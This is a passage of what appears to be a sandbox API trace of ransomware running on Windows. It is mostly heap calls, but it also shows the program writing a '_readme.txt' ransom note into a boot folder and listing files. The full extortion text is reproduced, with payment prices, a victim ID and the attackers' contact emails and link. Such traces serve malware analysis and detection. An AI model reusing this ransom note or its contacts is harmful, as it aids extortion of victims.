hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.408] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0174.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.408] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.408] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.408] PathFindFileNameW (pszPath="") returned="" [0174.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.408] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.409] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0174.409] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.409] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.409] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0174.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.409] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0174.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.410] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.410] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.410] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.411] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*" (normalized: "c:\\boot\\el-gr\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.412] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.412] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.412] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.412] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.413] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.427] HeapFree (in: hHeap=0x6a0000, 